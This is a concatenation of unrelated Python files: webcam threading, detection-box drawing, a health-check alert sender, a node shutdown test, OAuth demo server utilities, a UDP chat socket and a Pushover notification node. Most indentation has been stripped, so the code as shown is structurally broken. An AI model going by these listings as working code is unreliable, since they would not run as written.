def __init__(self, src, width, height):
        # Initialize the video camera stream and read the first frame from it
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
        # Initialize the flag used to indicate whether the thread should be stopped
self.stopped = False
def start(self):
        # Start the thread that reads frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
        # Keep looping indefinitely until the thread is stopped
while True:
            # If the stop flag is set, end the thread
if self.stopped:
return
            # Otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
        # Return the most recently read frame
return self.frame
def stop(self):
        # Indicate that the thread should be stopped
self.stopped = True
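# Typical combined usage of the two helpers above (illustrative comment, not in the original):
#   stream = WebcamVideoStream(src=0, width=640, height=480).start()
#   fps = FPS().start()
#   frame = stream.read(); fps.update()          # inside the processing loop
#   fps.stop(); stream.stop(); print(fps.fps())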
def standard_colors():
colors = [
'AliceBlue', 'Chartreuse', 'Aqua', 'Aquamarine', 'Azure', 'Beige', 'Bisque',
'BlanchedAlmond', 'BlueViolet', 'BurlyWood', 'CadetBlue', 'AntiqueWhite',
'Chocolate', 'Coral', 'CornflowerBlue', 'Cornsilk', 'Crimson', 'Cyan',
'DarkCyan', 'DarkGoldenRod', 'DarkGrey', 'DarkKhaki', 'DarkOrange',
'DarkOrchid', 'DarkSalmon', 'DarkSeaGreen', 'DarkTurquoise', 'DarkViolet',
'DeepPink', 'DeepSkyBlue', 'DodgerBlue', 'FireBrick', 'FloralWhite',
'ForestGreen', 'Fuchsia', 'Gainsboro', 'GhostWhite', 'Gold', 'GoldenRod',
'Salmon', 'Tan', 'HoneyDew', 'HotPink', 'IndianRed', 'Ivory', 'Khaki',
'Lavender', 'LavenderBlush', 'LawnGreen', 'LemonChiffon', 'LightBlue',
'LightCoral', 'LightCyan', 'LightGoldenRodYellow', 'LightGray', 'LightGrey',
'LightGreen', 'LightPink', 'LightSalmon', 'LightSeaGreen', 'LightSkyBlue',
'LightSlateGray', 'LightSlateGrey', 'LightSteelBlue', 'LightYellow', 'Lime',
'LimeGreen', 'Linen', 'Magenta', 'MediumAquaMarine', 'MediumOrchid',
'MediumPurple', 'MediumSeaGreen', 'MediumSlateBlue', 'MediumSpringGreen',
'MediumTurquoise', 'MediumVioletRed', 'MintCream', 'MistyRose', 'Moccasin',
'NavajoWhite', 'OldLace', 'Olive', 'OliveDrab', 'Orange', 'OrangeRed',
'Orchid', 'PaleGoldenRod', 'PaleGreen', 'PaleTurquoise', 'PaleVioletRed',
'PapayaWhip', 'PeachPuff', 'Peru', 'Pink', 'Plum', 'PowderBlue', 'Purple',
'Red', 'RosyBrown', 'RoyalBlue', 'SaddleBrown', 'Green', 'SandyBrown',
'SeaGreen', 'SeaShell', 'Sienna', 'Silver', 'SkyBlue', 'SlateBlue',
'SlateGray', 'SlateGrey', 'Snow', 'SpringGreen', 'SteelBlue', 'GreenYellow',
'Teal', 'Thistle', 'Tomato', 'Turquoise', 'Violet', 'Wheat', 'White',
'WhiteSmoke', 'Yellow', 'YellowGreen'
]
return colors
def color_name_to_rgb():
colors_rgb = []
for key, value in colors.cnames.items():
colors_rgb.append((key, struct.unpack('BBB', bytes.fromhex(value.replace('#', '')))))
return dict(colors_rgb)
def draw_boxes_and_labels(
boxes,
classes,
scores,
category_index,
instance_masks=None,
keypoints=None,
max_boxes_to_draw=20,
min_score_thresh=.5,
agnostic_mode=False):
"""Retorna as coordenadas das caixas, os nomes das classes e as cores
Args:
boxes: numpy array shape [N, 4]
classes: numpy array shape [N]
scores: numpy array shape [N] or None
category_index: um dicionário contendo dicionários de categoria
keypoints: numpy array shape [N, num_keypoints, 2]
max_boxes_to_draw: número máximo de caixas a serem visualizadas.
min_score_thresh: Limite de score mínima para uma caixa a ser visualizada
agnostic_mode: boolean (default: False)
"""
    # Create a display string (and color) for each box location and group all boxes that map to the same location.
box_to_display_str_map = collections.defaultdict(list)
box_to_color_map = collections.defaultdict(str)
box_to_instance_masks_map = {}
box_to_keypoints_map = collections.defaultdict(list)
if not max_boxes_to_draw:
max_boxes_to_draw = boxes.shape[0]
for i in range(min(max_boxes_to_draw, boxes.shape[0])):
if scores is None or scores[i] > min_score_thresh:
box = tuple(boxes[i].tolist())
if instance_masks is not None:
box_to_instance_masks_map[box] = instance_masks[i]
if keypoints is not None:
box_to_keypoints_map[box].extend(keypoints[i])
if scores is None:
box_to_color_map[box] = 'black'
else:
if not agnostic_mode:
if classes[i] in category_index.keys():
class_name = category_index[classes[i]]['name']
else:
class_name = 'N/A'
display_str = '{}: {}%'.format(
class_name,
int(100 * scores[i]))
else:
display_str = 'score: {}%'.format(int(100 * scores[i]))
box_to_display_str_map[box].append(display_str)
if agnostic_mode:
box_to_color_map[box] = 'DarkOrange'
else:
box_to_color_map[box] = standard_colors()[
classes[i] % len(standard_colors())]
    # Collect all box coordinates, class names and colors
color_rgb = color_name_to_rgb()
rect_points = []
class_names = []
class_colors = []
for box, color in six.iteritems(box_to_color_map):
ymin, xmin, ymax, xmax = box
rect_points.append(dict(ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax))
class_names.append(box_to_display_str_map[box])
class_colors.append(color_rgb[color.lower()])
return rect_points, class_names, class_colors
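if __name__ == '__main__':
    # Hedged, illustrative use of draw_boxes_and_labels with made-up detections.
    # numpy is assumed to be installed; it is not imported by this module itself.
    import numpy as np
    boxes = np.array([[0.1, 0.1, 0.5, 0.5], [0.2, 0.3, 0.9, 0.8]])
    classes = np.array([1, 2])
    scores = np.array([0.9, 0.4])
    category_index = {1: {'name': 'person'}, 2: {'name': 'car'}}
    rects, names, cols = draw_boxes_and_labels(boxes, classes, scores, category_index)
    # Only the first detection passes the default 0.5 score threshold.
    print(rects, names, cols)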
|
sendalerts.py
|
from datetime import timedelta as td
import time
import requests
from django.db.models import F, Max
from threading import Thread
from django.core.management.base import BaseCommand
from django.utils import timezone
from hc.api.models import Check, Flip
from statsd.defaults.env import statsd
SENDING_TMPL = "Sending alert, status=%s, code=%s\n"
SEND_TIME_TMPL = "Sending took %.1fs, code=%s\n"
def notify(flip_id, stdout):
flip = Flip.objects.get(id=flip_id)
check = flip.owner
# Set the historic status here but *don't save it*.
# It would be nicer to pass the status explicitly, as a separate parameter.
check.status = flip.new_status
# And just to make sure it doesn't get saved by a future coding accident:
setattr(check, "save", None)
stdout.write(SENDING_TMPL % (flip.new_status, check.code))
# Set dates for followup nags
if flip.new_status == "down":
check.project.set_next_nag_date()
# Send notifications
send_start = timezone.now()
errors = flip.send_alerts()
for ch, error in errors:
stdout.write("ERROR: %s %s %s\n" % (ch.kind, ch.value, error))
# If sending took more than 5s, log it
send_time = timezone.now() - send_start
if send_time.total_seconds() > 5:
stdout.write(SEND_TIME_TMPL % (send_time.total_seconds(), check.code))
statsd.timing("hc.sendalerts.dwellTime", send_start - flip.created)
statsd.timing("hc.sendalerts.sendTime", send_time)
def notify_on_thread(flip_id, stdout):
t = Thread(target=notify, args=(flip_id, stdout))
t.start()
class Command(BaseCommand):
help = "Sends UP/DOWN email alerts"
def add_arguments(self, parser):
parser.add_argument(
"--no-loop",
action="store_false",
dest="loop",
default=True,
help="Do not keep running indefinitely in a 2 second wait loop",
)
parser.add_argument(
"--no-threads",
action="store_false",
dest="use_threads",
            default=True,
help="Send alerts synchronously, without using threads",
)
def process_one_flip(self, use_threads=True):
def _notify(_flip):
if use_threads:
notify_on_thread(_flip.id, self.stdout)
else:
notify(_flip.id, self.stdout)
        ####
        # Custom code for Squad: only consider the most recent flip per check,
        # keeping the original processing logic below unchanged as much as possible.
        # ####
latest_flips_list = Flip.objects.values('owner_id').annotate(latest_flip_id=Max('id')).values(
'owner_id', 'latest_flip_id'
)
flip = Flip.objects.filter(
next_alert_at__lte=timezone.now(), new_status="down", owner__status__in=("up", "down"),
id__in=[f['latest_flip_id'] for f in latest_flips_list]
).order_by("id").first()
if flip is not None:
q = Flip.objects.filter(id=flip.id, next_alert_at__lte=timezone.now(), new_status="down")
num_updated = q.update(next_alert_at=F('next_alert_at') + flip.owner.timeout + flip.owner.grace)
if num_updated != 1:
return True
_notify(flip)
""" Find unprocessed flip, send notifications. """
# Order by processed, otherwise Django will automatically order by id
# and make the query less efficient
flip = Flip.objects.filter(processed=None).order_by("processed").first()
if flip is None:
return False
q = Flip.objects.filter(id=flip.id, processed=None)
num_updated = q.update(processed=timezone.now())
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
_notify(flip)
return True
def handle_going_down(self):
""" Process a single check going down. """
now = timezone.now()
q = Check.objects.filter(alert_after__lt=now).exclude(status="down")
# Sort by alert_after, to avoid unnecessary sorting by id:
check = q.order_by("alert_after").first()
if check is None:
return False
old_status = check.status
q = Check.objects.filter(id=check.id, status=old_status)
try:
status = check.get_status(with_started=False)
except Exception as e:
# Make sure we don't trip on this check again for an hour:
# Otherwise sendalerts may end up in a crash loop.
q.update(alert_after=now + td(hours=1))
# Then re-raise the exception:
raise e
if status != "down":
# It is not down yet. Update alert_after
q.update(alert_after=check.going_down_after())
return True
# Atomically update status
flip_time = check.going_down_after()
num_updated = q.update(alert_after=None, status="down")
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
flip = Flip(owner=check)
flip.created = flip_time
flip.old_status = old_status
flip.next_alert_at = flip_time + check.timeout
flip.new_status = "down"
flip.save()
return True
def handle(self, use_threads=True, loop=True, *args, **options):
self.stdout.write("sendalerts is now running\n")
i, sent = 0, 0
while True:
# Create flips for any checks going down
while self.handle_going_down():
pass
# Process the unprocessed flips
while self.process_one_flip(use_threads):
sent += 1
if not loop:
break
time.sleep(2)
i += 1
if i % 60 == 0:
timestamp = timezone.now().isoformat()
self.stdout.write("-- MARK %s --\n" % timestamp)
requests.get('https://hc-ping.com/8bbf4b71-45cd-47d5-8425-4d5982419823')
return "Sent %d alert(s)" % sent
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Askalcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test askalcoind shutdown."""
from test_framework.test_framework import AskalcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(AskalcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
utils.py
|
"""NDG OAuth Paste utilities for example code
"""
__author__ = "P J Kershaw"
__date__ = "19/10/12"
__copyright__ = "(C) 2009 Science and Technology Facilities Council"
__contact__ = "Philip.Kershaw@stfc.ac.uk"
__revision__ = "$Id:$"
from os import path
from threading import Thread
import optparse
from OpenSSL import crypto, SSL
from paste.deploy import loadapp
from paste.script.util.logging_config import fileConfig
import paste.httpserver
THIS_DIR = path.dirname(__file__)
SHARED_CONFIG_DIR = path.join(THIS_DIR, 'shared_config')
PKI_DIR = path.join(SHARED_CONFIG_DIR, 'pki')
CACERT_DIR = path.join(PKI_DIR, 'ca')
def serve_app(config_filepath):
defCertFilePath = path.join(PKI_DIR, 'localhost.pem')
defPriKeyFilePath = path.join(PKI_DIR, 'localhost.pem')
parser = optparse.OptionParser()
parser.add_option("-p",
"--port",
dest="port",
default=5000,
type='int',
help="port number to run under")
parser.add_option("-s",
"--with-ssl",
dest="with_ssl",
default='True',
help="Run with SSL")
parser.add_option("-c",
"--cert-file",
dest='certFilePath',
default=defCertFilePath,
help="SSL Certificate file")
parser.add_option("-k",
"--private-key-file",
default=defPriKeyFilePath,
dest='priKeyFilePath',
help="SSL private key file")
parser.add_option("-f",
"--conf",
dest="configFilePath",
default=config_filepath,
help="Configuration file path")
parser.add_option("-a",
"--with-ssl-client-auth",
dest="ssl_client_authn",
action='store_true',
default=False,
help="Set client authentication with SSL (requires -s "
"option")
opt = parser.parse_args()[0]
config_filepath = path.abspath(opt.configFilePath)
if opt.with_ssl.lower() == 'true':
ssl_context = SSL.Context(SSL.TLSv1_METHOD)
ssl_context.use_privatekey_file(opt.priKeyFilePath)
ssl_context.use_certificate_file(opt.certFilePath)
# Load the application from the Paste ini file configuration
fileConfig(config_filepath,
defaults={'here': path.dirname(config_filepath)})
app = loadapp('config:%s' % config_filepath)
if opt.ssl_client_authn:
ssl_context.load_verify_locations(None, CACERT_DIR)
ssl_context.set_verify_depth(9)
# Wrap the application in middleware to set the SSL client certificate
# obtained from the SSL handshake in environ
app = OpenSSLVerifyCallbackMiddleware(app)
_callback = app.create_ssl_callback()
# Wrap in middleware to simulate Apache environment
app = ApacheSSLVariablesMiddleware(app)
ssl_context.set_verify(SSL.VERIFY_PEER, _callback)
server = PasteDeployAppServer(app=app,
port=opt.port,
ssl_context=ssl_context)
else:
server = PasteDeployAppServer(config_filepath=config_filepath,
port=opt.port)
server.start()
class PasteDeployAppServer(object):
"""Wrapper to paste.httpserver to enable background threading"""
def __init__(self, app=None, config_filepath=None, port=7443, host='0.0.0.0',
ssl_context=None):
"""Load an application configuration from config_filepath ini file and
instantiate Paste server object
"""
self.__thread = None
if config_filepath:
if app:
raise KeyError('Set either the "config_filepath" or "app" '
'keyword but not both')
fileConfig(config_filepath,
defaults={'here':path.dirname(config_filepath)})
app = loadapp('config:%s' % config_filepath)
elif app is None:
raise KeyError('Either the "config_filepath" or "app" keyword must '
'be set')
self.__paste_server = paste.httpserver.serve(app, host=host, port=port,
start_loop=False,
ssl_context=ssl_context)
@property
def pasteServer(self):
return self.__paste_server
@property
def thread(self):
return self.__thread
def start(self):
"""Start server"""
self.pasteServer.serve_forever()
def startThread(self):
"""Start server in a separate thread"""
self.__thread = Thread(target=PasteDeployAppServer.start, args=(self,))
self.thread.start()
def terminateThread(self):
self.pasteServer.server_close()
class OpenSSLVerifyCallbackMiddleware(object):
"""Set peer certificate retrieved from PyOpenSSL SSL context callback in
environ dict SSL_CLIENT_CERT item
FOR TESTING PURPOSES ONLY - IT IS NOT THREAD SAFE
"""
def __init__(self, app):
self._app = app
self.ssl_client_cert = None
self.ssl_client_cert_dn = None
self.ignore_pat = None
def create_ssl_callback(self):
"""Make a SSL Context callback function and return it to the caller"""
def _callback(conn, x509, errnum, errdepth, ok):
if errdepth == 0:
subject = x509.get_subject()
components = subject.get_components()
if self.ignore_pat not in [i[-1] for i in components]:
self.ssl_client_cert = crypto.dump_certificate(
crypto.FILETYPE_PEM, x509)
self.ssl_client_cert_dn = '/'+ '/'.join(
['%s=%s' % i for i in components])
return ok
return _callback
def __call__(self, environ, start_response):
"""Set the latest peer SSL client certificate from the SSL callback
into environ SSL_CLIENT_CERT key"""
if self.ssl_client_cert:
environ['SSL_CLIENT_CERT'] = self.ssl_client_cert
environ['SSL_CLIENT_S_DN'] = self.ssl_client_cert_dn
self.ssl_client_cert = None
return self._app(environ, start_response)
class ApacheSSLVariablesMiddleware(object):
"""Simulate Apache SSL environment setting relevant environ variables"""
def __init__(self, app):
self._app = app
def __call__(self, environ, start_response):
environ['HTTPS'] = '1'
return self._app(environ, start_response)
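if __name__ == '__main__':
    # Hedged sketch (not in the original module): how the middleware classes above
    # wrap a WSGI application. The dummy app and environ below are assumptions.
    def _demo_app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return [('HTTPS=%s' % environ.get('HTTPS')).encode('utf-8')]
    wrapped = ApacheSSLVariablesMiddleware(_demo_app)
    body = wrapped({}, lambda status, headers: None)
    print(body)  # [b'HTTPS=1'] - the middleware injected the Apache-style variable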
|
netw.py
|
import json
import socket as st
import threading as thr
import tkinter as tk
from datetime import datetime
from dataclasses import dataclass
class MessengerSocket(st.socket):
def __init__(self, family=st.AF_INET, type=st.SOCK_DGRAM):
super(MessengerSocket, self).__init__(family, type)
def startlistening(self):
receivethread = thr.Thread(target=self.listenformsg, daemon=True)
receivethread.start()
def listenformsg(self):
while True:
jsondata, addr = self.serversocket.recvfrom(1024)
if self.sound_variable.get():
self.play()
self.incmessage = Message()
self.incmessage.updt(jsondata)
self.ausgabe.configure(state='normal')
current_time = datetime.now().strftime("%H:%M")
if self.incmessage.name != "":
if addr[0] == "127.0.0.1":
self.ausgabe.insert(
tk.END, f"[{current_time}] {self.incmessage.name} (You): '{self.incmessage.msg}' \n")
else:
self.ausgabe.insert(
tk.END, f"[{current_time}] {self.incmessage.name} : '{self.incmessage.msg}' \n")
elif addr[0] == "127.0.0.1":
self.ausgabe.insert(
tk.END, f"[{current_time}] {addr[0]} (You): '{self.incmessage.msg}' \n")
else:
self.ausgabe.insert(
tk.END, f"[{current_time}] {addr[0]} : '{self.incmessage.msg}' \n")
self.ausgabe.configure(state='disabled')
self.ausgabe.see("end")
def sendmessage(self, event=None):
"""Funktion zum Senden einer Nachricht"""
if self.msg_Entry.get() == "":
return
self.empfaenger = "localhost"
if not self.widg.validIP():
self.bell()
self.invalidIP_Label.pack()
else:
self.send()
def send(self): # suggested by Sorcery
if self.user_IP != "...":
self.empfaenger = self.user_IP
self.message = self.Message(name=self.name_Entry.get(),
msg=self.msg_Entry.get())
        # send the message to the destination address via the socket
self.serversocket.sendto(self.message.encoded(),
(self.empfaenger, self.port))
        # echo the message in the output widget, then clear the input widget
self.ausgabe.configure(state='normal')
if self.message.name == "":
self.ausgabe.insert(
tk.END, f"You: '{self.message.msg}'\n", "right")
else:
self.ausgabe.insert(
tk.END, f"{self.message.name} (You): '{self.message.msg}'\n", "right")
self.ausgabe.configure(state='disabled')
self.ausgabe.see("end")
self.msg_Entry.delete(0, tk.END)
@dataclass
class Message:
name: str = ""
msg: str = ""
def __jsondumps(self):
return json.dumps(self.__dict__)
def jsonloads(self, jsonmsg):
return json.loads(self.__decoded(jsonmsg))
def __decoded(self, jsonmsg):
return jsonmsg.decode("utf-8")
def encoded(self):
return self.__jsondumps().encode("utf-8")
def updt(self, jsonmsg):
self.__dict__.update(self.jsonloads(jsonmsg))
if __name__ == '__main__':
print("networking")
|
Pushover.py
|
"""
Notification Pushover Node
TODO:
- Make sure pushover name is get_valid_node_name, and Length
- Clean out profile directory?
- Make list of sounds
- Allow groups of devices in configuration
"""
from udi_interface import Node,LOGGER
from threading import Thread,Event
import time
import logging
import collections
from node_funcs import make_file_dir,is_int,get_default_sound_index
ERROR_NONE = 0
ERROR_UNKNOWN = 1
ERROR_APP_AUTH = 2
ERROR_USER_AUTH = 3
ERROR_MESSAGE_CREATE = 4
ERROR_MESSAGE_SEND = 5
ERROR_PARAM = 6
REM_PREFIX = "REMOVED-"
# How many tries to get or post, -1 is forever
RETRY_MAX = -1
# How long to wait between tries, in seconds
RETRY_WAIT = 5
class Pushover(Node):
"""
"""
def __init__(self, controller, primary, address, name, session, info):
"""
"""
# Need these for l_debug
self.name = name
self.address = address
self.controller = controller
self.session = session
self.info = info
self.iname = info['name']
self.oid = self.id
self.id = 'pushover_' + self.iname
self.app_key = self.info['app_key']
self.user_key = self.info['user_key']
self._sys_short = None
LOGGER.debug('{} {}'.format(address,name))
controller.poly.subscribe(controller.poly.START, self.handler_start, address)
super(Pushover, self).__init__(controller.poly, primary, address, name)
def handler_start(self):
"""
"""
LOGGER.info('')
# We track our driver values because we need the value before it's been pushed.
self.driver = {}
self.set_device(self.get_device())
self.set_priority(self.get_priority())
self.set_format(self.get_format())
self.set_retry(self.get_retry())
self.set_expire(self.get_expire())
self.set_sound(self.get_sound())
# TODO: This should be stored at the node level, but PG2 didn't allow
# that so eventually it should be moved to the node?
self.devices_list = self.controller.Data.get('devices_list',[])
self.sounds_list = self.controller.Data.get('sounds_list',[])
LOGGER.info("devices_list={}".format(self.devices_list))
LOGGER.debug('Authorizing pushover app {}'.format(self.app_key))
vstat = self.validate()
if vstat['status'] is False:
self.authorized = False
else:
self.authorized = True if vstat['status'] == 1 else False
LOGGER.info("Authorized={}".format(self.authorized))
if self.authorized:
LOGGER.info("got devices={}".format(vstat['data']['devices']))
self.build_device_list(vstat['data']['devices'])
self.build_sound_list()
self.controller.Data['devices_list'] = self.devices_list
self.controller.Data['sounds_list'] = self.sounds_list
self.set_error(ERROR_NONE)
self._init_st = True
else:
self.set_error(ERROR_APP_AUTH)
self._init_st = False
def validate(self):
res = self.session.post("1/users/validate.json",
{
'user': self.user_key,
'token': self.app_key,
})
LOGGER.debug('got: {}'.format(res))
return res
# Add items in second list to first if they don't exist
# self.controler.add_to_list(self.devices_list,vstat['devices'])
def build_device_list(self,vlist):
if len(self.devices_list) == 0:
self.devices_list.append('all')
self.devices_list[0] = 'all'
# Add new items
for item in vlist:
# If it's not in the saved list, append it
if self.devices_list.count(item) == 0:
self.devices_list.append(item)
# Make sure items are in the passed in list, otherwise prefix it
# in devices_list
for item in self.devices_list:
if item != 'all' and not item.startswith(REM_PREFIX) and vlist.count(item) == 0:
self.devices_list[self.devices_list.index(item)] = REM_PREFIX + item
LOGGER.info("devices_list={}".format(self.devices_list))
# Build the list of sounds, make sure the order of the list never changes.
# sounds_list is a list of 2 element lists with shortname, longname
# It has to be a list to keep the order the same, and be able to store
# in Polyglot params
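    # Illustrative shape (added comment; the entries below are assumptions):
    #   sounds_list = [['pushover', 'Pushover (default)', 0],
    #                  ['mycustom', 'My Custom Sound', 100]]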
def build_sound_list(self):
res = self.get("1/sounds.json")
LOGGER.debug('got: {}'.format(res))
# Always build a new list
sounds_list = []
custom_index = 100 # First index for a custom sound
if res['status']:
#
# Build list with default sounds
#
for skey in res['data']['sounds']:
# Is it a default?
idx = get_default_sound_index(skey)
if idx >= 0:
sounds_list.append([skey, res['data']['sounds'][skey], idx])
LOGGER.debug('sounds={}'.format(sounds_list))
#
# Add any custom sounds
#
# hash for quick lookup of name to index of existing sounds_list
es = {}
for item in self.sounds_list:
es[item[0]] = item
if len(item) == 3:
# New style, if already have custom ones saved remember the max index
if item[2] > custom_index:
custom_index = item[2]
# Add to our list if not exists.
for skey in res['data']['sounds']:
# Add to list if we have it, otherwise append
if skey in es:
# and not a default
if get_default_sound_index(skey) == -1:
item = es[skey]
if len(item) == 2:
# Old style, add index
custom_index += 1
sounds_list.append([item[0],item[1],custom_index])
else:
sounds_list.append(item)
else:
custom_index += 1
sounds_list.append([skey, res['data']['sounds'][skey], custom_index])
LOGGER.debug('sounds={}'.format(sounds_list))
# Make sure items are in the existing list, otherwise prefix it in devices_list
for item in self.sounds_list:
if not item[0] in res['data']['sounds']:
name = item[0] if item[0].startswith(REM_PREFIX) else REM_PREFIX + item[0]
if len(item) == 2:
# Old style without index
custom_index += 1
sounds_list.append([item[0],name,custom_index])
else:
sounds_list.append([item[0],name,item[2]])
self.sounds_list = sorted(sounds_list, key=lambda sound: sound[2])
LOGGER.debug('sounds={}'.format(self.sounds_list))
return res
"""
This lets the controller know when we are initialized, or if we had
    an error. Since it can't call our write_profile until we have initialized
None = Still initializing
False = Failed
True = All Good
"""
def init_st(self):
return self._init_st
def query(self):
self.reportDrivers()
def setDriver(self,driver,value):
self.driver[driver] = value
super(Pushover, self).setDriver(driver,value)
def getDriver(self,driver):
if driver in self.driver:
return self.driver[driver]
else:
return super(Pushover, self).getDriver(driver)
def config_info_rest(self):
        str = '<li>curl -d \'{{"node":"{0}", "message":"The Message", "subject":"The Subject"}}\' -H "Content-Type: application/json" -X POST {1}/send'.format(self.address,self.controller.rest.listen_url)
return str
def config_info_nr(self):
if self.controller.rest is None:
rest_ip = "None"
rest_port = "None"
else:
rest_ip = self.controller.rest.ip
rest_port = self.controller.rest.listen_port
info = [
'<li>Example Network Resource settings for Pushover<ul><li>http<li>POST<li>Host:{0}<li>Port:{1}<li>Path: /send?node={2}&Subject=My+Subject&monospace=1&device=1&priority=2<li>Encode URL: not checked<li>Timeout: 5000<li>Mode: Raw Text</ul>'.format(rest_ip,rest_port,self.address),
'</ul>',
            '<p>The params in the Path can be any of the below; if a param is not passed then the default from the pushover node will be used',
'<table>',
'<tr><th>Name<th>Value<th>Description',
]
i = 0
t = 'device'
for item in self.devices_list:
info.append('<tr><td>{}<td>{}<td>{}'.format(t,i,item))
i += 1
t = ' '
t = 'sound'
for item in self.sounds_list:
info.append('<tr><td>{}<td>{}<td>{}'.format(t,item[2],item[1]))
t = ' '
info = info + [
'<tr><td>monospace<td>1<td>use Monospace Font',
'<tr><td> <td>0<td>Normal Font',
'<tr><td>priority<td>-2<td>Lowest',
'<tr><td> <td>-1<td>Low',
'<tr><td> <td>0<td>Normal',
'<tr><td> <td>1<td>High',
'<tr><td> <td>2<td>Emergency',
'<tr><td>html<td>1<td>Enable html',
'<tr><td> <td>0<td>No html',
'<tr><td>retry<td>n<td>Set Emergency retry to n',
            '<tr><td>expire<td>n<td>Set Emergency expire to n',
'</table>'
]
return ''.join(info)
def write_profile(self,nls):
pfx = 'write_profile'
LOGGER.debug('')
#
# nodedefs
#
# Open the template, and read into a string for formatting.
template_f = 'template/nodedef/pushover.xml'
LOGGER.debug("Reading {}".format(template_f))
with open (template_f, "r") as myfile:
data=myfile.read()
myfile.close()
# Open the output nodedefs file
output_f = 'profile/nodedef/{0}.xml'.format(self.iname)
make_file_dir(output_f)
# Write the nodedef file with our info
LOGGER.debug("Writing {}".format(output_f))
out_h = open(output_f, "w")
out_h.write(data.format(self.id,self.iname))
out_h.close()
#
# nls
#
nls.write("\n# Entries for Pushover {} {}\n".format(self.id,self.name))
nls.write("ND-{0}-NAME = {1}\n".format(self.id,self.name))
idx = 0
subst = []
for item in self.devices_list:
nls.write("POD_{}-{} = {}\n".format(self.iname,idx,item))
# Don't include REMOVED's in list
if not item.startswith(REM_PREFIX):
subst.append(str(idx))
idx += 1
        # Make sure it has at least one
if len(subst) == 0:
subst.append('0')
sound_subst = []
for item in self.sounds_list:
nls.write("POS_{}-{} = {}\n".format(self.iname,item[2],item[1]))
# Don't include REMOVED's in list
if not item[1].startswith(REM_PREFIX):
sound_subst.append(str(item[2]))
#
# editor
#
# Open the template, and read into a string for formatting.
template_f = 'template/editor/pushover.xml'
LOGGER.debug("Reading {}".format(template_f))
with open (template_f, "r") as myfile:
data=myfile.read()
myfile.close()
# Write the editors file with our info
output_f = 'profile/editor/{0}.xml'.format(self.iname)
make_file_dir(output_f)
LOGGER.debug("Writing {}".format(output_f))
editor_h = open(output_f, "w")
# TODO: We could create a better subst with - and , but do we need to?
# TODO: Test calling get_subset_str in node_funcs.py
editor_h.write(data.format(self.iname,",".join(subst),",".join(sound_subst)))
editor_h.close()
def set_device(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV1 to {}'.format(val))
self.setDriver('GV1', val)
def get_device(self):
cval = self.getDriver('GV1')
if cval is None:
return 0
return int(cval)
def get_device_name_by_index(self,dev=None):
LOGGER.debug('dev={}'.format(dev))
if dev is None:
dev = self.get_device()
LOGGER.debug('dev={}'.format(dev))
else:
if not is_int(dev):
LOGGER.error('Passed in {} is not an integer'.format(dev))
return False
dev = int(dev)
dev_name = None
try:
# 0 is all, so return none, otherwise look up the name
if dev > 0:
dev_name = self.devices_list[dev]
except:
LOGGER.error('Bad device index {}'.format(dev),exc_info=True)
self.set_error(ERROR_PARAM)
return False
return dev_name
def set_st(self,val):
LOGGER.info(val)
if val is False or val is None:
val = 0
elif val is True:
val = 1
else:
val = int(val)
LOGGER.info('Set ST to {}'.format(val))
self.setDriver('ST', val)
def set_error(self,val):
LOGGER.info(val)
if val is False:
val = 0
elif val is True:
val = 1
LOGGER.info('Set ERR to {}'.format(val))
self.setDriver('ERR', val)
self.set_st(True if val == 0 else False)
def set_priority(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV2 to {}'.format(val))
self.setDriver('GV2', val)
def get_priority(self):
cval = self.getDriver('GV2')
if cval is None:
return 0
return int(self.getDriver('GV2'))
def set_format(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV3 to {}'.format(val))
self.setDriver('GV3', val)
def get_format(self):
cval = self.getDriver('GV3')
if cval is None:
return 0
return int(self.getDriver('GV3'))
def set_retry(self,val):
LOGGER.info(val)
if val is None:
val = 30
val = int(val)
LOGGER.info('Set GV4 to {}'.format(val))
self.setDriver('GV4', val)
def get_retry(self):
cval = self.getDriver('GV4')
if cval is None:
return 30
return int(self.getDriver('GV4'))
def set_expire(self,val):
LOGGER.info(val)
if val is None:
val = 10800
val = int(val)
LOGGER.info('Set GV5 to {}'.format(val))
self.setDriver('GV5', val)
def get_expire(self):
cval = self.getDriver('GV5')
if cval is None:
return 10800
return int(self.getDriver('GV5'))
def get_sound(self):
cval = self.getDriver('GV6')
if cval is None:
return 0
return int(self.getDriver('GV6'))
def set_sound(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV6 to {}'.format(val))
self.setDriver('GV6', val)
def get_message(self):
cval = self.getDriver('GV7')
if cval is None:
return 0
return int(self.getDriver('GV7'))
def set_message(self,val):
LOGGER.info(val)
if val is None:
val = 0
val = int(val)
LOGGER.info('Set GV7 to {}'.format(val))
self.setDriver('GV7', val)
def get_sys_short(self):
return self._sys_short
def set_sys_short(self,val):
LOGGER.info(val)
self._sys_short = val
    # Convert our priority numbers, which start at zero, to Pushover priority numbers, which start at -2
